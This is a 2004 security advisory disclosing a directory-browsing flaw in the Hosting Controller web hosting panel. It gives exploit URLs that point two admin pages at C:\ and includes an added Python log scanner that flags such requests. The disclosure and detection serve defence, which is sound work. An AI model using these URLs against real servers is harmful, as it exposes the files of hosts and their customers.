Hosting Controller

2004-12-06T00:00:00
ID SECURITYVULNS:DOC:7289
Type securityvulns
Reporter Securityvulns
Modified 2004-12-06T00:00:00

Description

                                   -= Security  Advisory =-

Advisory Information

Software Package    : Hosting Controller
Vendor Homepage     : http://www.hostingcontroller.com
Platforms           : Windows based servers
Vulnerable Versions : All versions (Tested on: v.6.1 Hotfix 1.4)
Vendor Contacted    : 12/5/2004
Release Date        : 12/7/2004

Summary

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. Hosting Controller has a security flaw which allows attackers to browse any file and any directory on that server.

Details

Vulnerability: browsing directories and files on the system. Foolish vulnerability:

1) This vulnerability is in admin/mail/Statsbrowse.asp, and attackers can view the hard disk by using this file.
   Log in with your account at http://www.yoursite.com/admin
   You now see http://www.yoursite.com/admin/main.asp
   Change this URL to http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0

2) This vulnerability is in admin/iis/Generalbrowse.asp, and attackers can view the hard disk by using this file.
   Log in with your account at http://www.yoursite.com/admin
   You now see http://www.yoursite.com/admin/main.asp
   Change this URL to http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\
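An added example (not part of the original advisory or the vendor's code): a Python check that scans IIS W3C logs for requests to the two pages named above whose FilePath resolves outside the hosting root. The root D:\hosting\sites, the log field layout and the sample log lines are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import parse_qs

# The two pages named in the advisory (compared case-insensitively, as IIS does).
BROWSE_PAGES = {"/admin/mail/statsbrowse.asp", "/admin/iis/generalbrowse.asp"}

# Assumption: customer content lives under this directory; adjust per server.
ALLOWED_ROOT = r"D:\hosting\sites"

def outside_root(path, root=ALLOWED_ROOT):
    """True if a Windows path, once normalised, is not inside root."""
    norm = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(root))
    return norm != base and not norm.startswith(base + "\\")

def suspicious_requests(log_lines):
    """Yield (client_ip, stem, FilePath) for browse requests that leave ALLOWED_ROOT."""
    fields = []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # the W3C header names the columns
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "")
        if stem.lower() not in BROWSE_PAGES:
            continue
        # parse_qs percent-decodes values; match the parameter name case-insensitively.
        query = {k.lower(): v for k, v in parse_qs(row.get("cs-uri-query", "")).items()}
        for value in query.get("filepath", []):
            if outside_root(value):
                yield row.get("c-ip", "-"), stem, value

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-12-07 10:01:02 192.0.2.10 GET /admin/main.asp - 200
2004-12-07 10:01:09 192.0.2.10 GET /admin/mail/Statsbrowse.asp FilePath=c:\&Opt=3&level=1&upflag=0 200
2004-12-07 10:02:30 192.0.2.11 GET /admin/iis/Generalbrowse.asp FilePath=D:%5Chosting%5Csites%5Creseller2 200
2004-12-07 10:03:11 192.0.2.10 GET /admin/iis/Generalbrowse.asp FilePath=D:%5Chosting%5Csites%5C..%5C..%5CWINNT 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, path in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested {stem} with FilePath={path}")
```

Paths are normalised before comparison, so a FilePath that starts inside the hosting root but climbs out with ".." segments is flagged as well.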

Solution

The vendor was notified and has released a patch. Update your software.

Credits

Discovered on May 6, 2004 by (\/) Mouse Mouse@Shabgard.org
Additional Research: s7az2mm and bl2k
http://Shabgard.org

References

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt